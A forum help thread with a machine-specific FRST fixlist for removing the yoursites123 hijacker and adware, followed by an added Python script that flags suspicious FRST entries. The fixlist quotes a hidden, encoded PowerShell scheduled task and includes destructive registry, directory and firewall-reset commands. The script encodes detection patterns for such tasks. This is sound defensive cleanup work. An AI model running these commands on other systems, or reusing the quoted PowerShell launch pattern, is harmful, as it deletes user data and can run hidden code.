
Removing yoursites123



Help is free, but please consider making a donation toward the upkeep of the site: click.

Besides the problem named in the title, there are more active adware objects. You should also be seeing various ads, e.g. on Allegro.

Actions to carry out:

1. Open Notepad and paste into it:

 

CloseProcesses:
CreateRestorePoint:
ShortcutWithArgument: C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Opera.lnk -> C:\Program Files (x86)\Opera\launcher.exe (Opera Software) -> hxxp://www.yoursites123.com/?type=sc&ts=1452253355&z=8f6443bb6331334243727aag5zfw8odofw9c4c7wco&from=wpm01073&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXF1E81UYJL6UYJL6
HKU\S-1-5-21-1157007284-3841837932-3106168173-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=130993241260851382&GUID=00000000-0000-0000-0000-000000000000
HKU\S-1-5-21-1157007284-3841837932-3106168173-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.yoursites123.com/?type=hp&ts=1452253355&z=8f6443bb6331334243727aag5zfw8odofw9c4c7wco&from=wpm01073&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXF1E81UYJL6UYJL6
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://yoursites123.com/web?type=ds&ts=1452253355&z=8f6443bb6331334243727aag5zfw8odofw9c4c7wco&from=wpm01073&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXF1E81UYJL6UYJL6&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-1157007284-3841837932-3106168173-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://yoursites123.com/web?type=ds&ts=1452253355&z=8f6443bb6331334243727aag5zfw8odofw9c4c7wco&from=wpm01073&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXF1E81UYJL6UYJL6&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1157007284-3841837932-3106168173-1000 -> {szukaj.gazeta.pl} URL = hxxp://szukaj.gazeta.pl/internet/0,0.html?slowo={searchTerms}
BHO-x32: Brak nazwy -> {d00ab4cc-662c-40b6-a85f-d53086f4bb16} -> Brak pliku
Toolbar: HKLM - avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - Brak pliku
Toolbar: HKLM - Brak nazwy - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - Brak pliku
Task: {278A9DBA-62D1-4376-9EA7-ED444CD029B4} - System32\Tasks\AdminShipkeeperXenolithsV2 => Rundll32.exe YardingConservatively.dll,main 7 1 
Task: {3A7FD0B5-4676-49CE-9E70-9ED19B714969} - System32\Tasks\{C25597C8-7C39-4F4A-893C-04C6732440F6} => pcalua.exe -a C:\Users\Admin\AppData\Roaming\yoursearching\UninstallManager.exe -c -ptid=cornl
Task: {4EA137CC-4CCE-481A-98FB-901677621525} - System32\Tasks\{6C961D7F-9D78-4A55-8AE3-5F5C92C1DFAC} => Firefox.exe hxxp://ui.skype.com/ui/0/6.3.73.105.456/pl/abandoninstall?page=tsProgressBar
Task: {4EF62F18-F30D-45EF-BC3E-F00E781761FB} - System32\Tasks\{C4E1EAC5-EBC4-4145-ABC0-4530E24C3F04} => Firefox.exe hxxp://ui.skype.com/ui/0/6.6.0.106/pl/abandoninstall?page=tsPlugin
Task: {561026AD-BBB2-4EB8-B29D-48CA246F0762} - System32\Tasks\{70DA3F7B-9CA4-4C2E-AF83-7643DEB344E4} => pcalua.exe -a E:\westerner\setup.exe -d E:\westerner
Task: {611B9B6D-76FB-4B4B-B548-B153B94D009F} - System32\Tasks\{410AE0AC-A18D-4FE1-ABCD-70E2873239E8} => Firefox.exe hxxp://ui.skype.com/ui/0/6.6.0.106/pl/abandoninstall?page=tsPlugin
Task: {6C519167-262A-4200-9BBB-ED0FA27AD2DC} - System32\Tasks\{73BE4A54-9082-4DA1-83D9-A314C418D544} => Firefox.exe hxxp://ui.skype.com/ui/0/6.6.73.106.456/pl/abandoninstall?page=tsWLM
Task: {9091ECCC-0947-4AB5-97A3-F4F7B63BC278} - System32\Tasks\{0F7F7947-050A-797E-7A11-7A090F79117A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand 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
Task: {BEE6820B-A5D5-45E6-AB6A-D5A4331B3475} - System32\Tasks\{B399420A-560F-4B7C-B3BD-F85BA49AEDAE} => Firefox.exe hxxp://ui.skype.com/ui/0/6.3.73.105.456/pl/abandoninstall?page=tsProgressBar
Task: {C1C71FE9-F10E-4D9C-A5B7-ED922E21FB3A} - System32\Tasks\{9CFB0D6C-72B7-4916-92F8-2A43298E80F1} => pcalua.exe -a E:\DATA\Install.exe -d E:\DATA
Task: {D7C0029C-1B7F-40A9-827E-8E6A1A46B1DC} - System32\Tasks\Price Fountain => C:\Users\Admin\AppData\Roaming\PRICEF~1\UPDATE~1\UPDATE~1.EXE 
Task: {F988A5E4-06EB-44F6-94CB-F946CD5678B8} - System32\Tasks\{E993273D-4EFE-4CEA-BCED-7F3E95AB859E} => Firefox.exe hxxp://ui.skype.com/ui/0/6.6.0.106/pl/abandoninstall?page=tsMain
Task: C:\Windows\Tasks\Price Fountain.job => C:\Users\Admin\AppData\Roaming\PRICEF~1\UPDATE~1\UPDATE~1.EXE 
DeleteKey: HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I
DeleteKey: HKCU\Software\dobreprogramy
DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\PriceFountain
DeleteKey: HKCU\Software\Mozilla
DeleteKey: HKLM\SOFTWARE\Mozilla
DeleteKey: HKLM\SOFTWARE\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla
DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org
DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Wow6432Node\yoursites123Software
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\yoursearching uninstall
RemoveDirectory: C:\Program Files (x86)\Free PDF to Word Doc Converter
RemoveDirectory: C:\Program Files (x86)\WinZipper
RemoveDirectory: C:\ProgramData\e9d408a6-1113-1
RemoveDirectory: C:\ProgramData\e9d408a6-4d47-0
RemoveDirectory: C:\ProgramData\e9d408a6-53b1-0
RemoveDirectory: C:\ProgramData\e9d408a6-6ea5-1
RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ares
RemoveDirectory: C:\Users\Admin\AppData\Local\Gameo
RemoveDirectory: C:\Users\Admin\AppData\Local\Mozilla
RemoveDirectory: C:\Users\Admin\AppData\Local\ShipkeeperXenoliths
RemoveDirectory: C:\Users\Admin\AppData\Roaming\Gameo
RemoveDirectory: C:\Users\Admin\AppData\Roaming\GoldenGate
RemoveDirectory: C:\Users\Admin\AppData\Roaming\Mozilla
RemoveDirectory: C:\Users\Admin\AppData\Roaming\PriceFountain
RemoveDirectory: C:\Users\Admin\AppData\Roaming\TSv
RemoveDirectory: C:\Users\Admin\AppData\Roaming\WinZipper
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware\Tools\Malwarebytes Anti-Malware Chameleon.lnk
C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Ares.lnk
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Play Games Online.url
C:\Users\Admin\Desktop\Continue WinRAR installation.lnk
C:\Users\Admin\Desktop\sh-remover.exe
C:\Windows\SysWOW64\pl.html
CMD: netsh advfirewall reset
EmptyTemp:

 

Note for other readers: this script is unique, tailored solely to this system; please do not use it on your own systems.

Save the file as fixlist.txt and place it next to the FRST tool. Run FRST and click Napraw (Fix). Wait patiently and do not interrupt the process. When the Fix finishes, the system will be restarted. A fixlog.txt file will be created in the same directory FRST was run from.

2. Repair the damaged special IE shortcut. Paste the path below into the Explorer address bar and press ENTER:

 

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools

 

Right-click the shortcut Internet explorer (bez dodatków) [Internet Explorer (No Add-ons)] located there > Properties > in the Target field, after the path "C:\Program Files\Internet Explorer (x86)\iexplore.exe", append two spaces and -extoff

3. Make a new FRST log using the Skanuj (Scan) option, again with Addition, but this time without Shortcut. Also attach the fixlog.txt file.

  • 1 month later...

As for step 2: open any folder, click in the address bar to highlight the whole path, paste the one I gave and press ENTER. In the folder there is a file named Internet explorer (bez dodatków); right-click it and edit it according to the instructions.

Once you have done this, provide the reports I asked for.

Edited by picasso
The topic is being closed due to lack of a reply. //picasso
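The entry types the fixlist in this thread targets (a browser shortcut with an appended URL, scheduled tasks that start hidden or encoded PowerShell or programs from AppData, and replaced search providers) can be flagged mechanically in FRST-style lines. The Python below is an added example, not part of the original thread and not FRST's own code; the heuristics, the `triage` function, the search-host allowlist and every sample line are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Constructed sample in the FRST line style; all paths, GUIDs and hosts are placeholders.
SAMPLE = r"""
ShortcutWithArgument: C:\Users\User\Desktop\Browser.lnk -> C:\Program Files\Browser\launcher.exe (Vendor) -> hxxp://hijack.example/?type=sc
Task: {TASK-GUID-1} - System32\Tasks\{TASK-NAME-1} => powershell.exe -nologo -executionpolicy bypass -windowstyle hidden -EncodedCommand <BASE64-PLACEHOLDER>
Task: {TASK-GUID-2} - System32\Tasks\Example Updater => C:\Users\User\AppData\Roaming\EXAMPL~1\UPDATE~1.EXE
Task: {TASK-GUID-3} - System32\Tasks\ExampleName => Rundll32.exe Example.dll,main 7 1
Task: {TASK-GUID-4} - System32\Tasks\Vendor Update => C:\Program Files\Vendor\update.exe /c
SearchScopes: HKLM -> {SCOPE-GUID} URL = hxxp://hijack.example/web?q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {SCOPE-GUID} URL = hxxp://www.bing.com/search?q={searchTerms}
""".strip().splitlines()

# Assumed heuristics, matched against the command that follows "=>" in a Task line.
TASK_RULES = [
    ("PowerShell run with an encoded command",
     re.compile(r"powershell(\.exe)?\s.*-(e|ec|enc\w*)\b", re.I)),
    ("PowerShell run with a hidden window",
     re.compile(r"powershell(\.exe)?\s.*-w\w*\s+hidden\b", re.I)),
    ("program started from the user's AppData folder",
     re.compile(r"\\AppData\\(Roaming|Local)\\", re.I)),
    ("rundll32 given a DLL name without a path",
     re.compile(r"^rundll32(\.exe)?\s+[^\\/:\s]+\.dll\b", re.I)),
]

def triage(lines, trusted_search_hosts=("www.bing.com",)):
    """Return (line_index, reason) for every entry that deserves a closer look."""
    findings = []
    for i, line in enumerate(lines):
        kind, _, rest = line.partition(":")
        if kind == "ShortcutWithArgument":
            # The text after the last "->" is what the shortcut passes to its target.
            arg = rest.rsplit("->", 1)[-1].strip()
            if re.match(r"h(xx|tt)ps?://", arg, re.I):
                findings.append((i, "shortcut passes a fixed URL to the browser"))
        elif kind == "Task" and "=>" in rest:
            cmd = rest.split("=>", 1)[1].strip()
            findings += [(i, why) for why, rx in TASK_RULES if rx.search(cmd)]
        elif kind == "SearchScopes" and "URL =" in rest:
            url = rest.split("URL =", 1)[1].strip()
            host = urlsplit(re.sub(r"^hxxp", "http", url, flags=re.I)).hostname or ""
            if host not in trusted_search_hosts:
                findings.append((i, f"search provider host not on allowlist: {host}"))
    return findings

if __name__ == "__main__":
    for index, reason in triage(SAMPLE):
        print(f"{reason}\n    {SAMPLE[index]}")
```

A hit is only a prompt to inspect the entry; legitimate software also creates tasks under AppData, so the output is a review list, not a removal list.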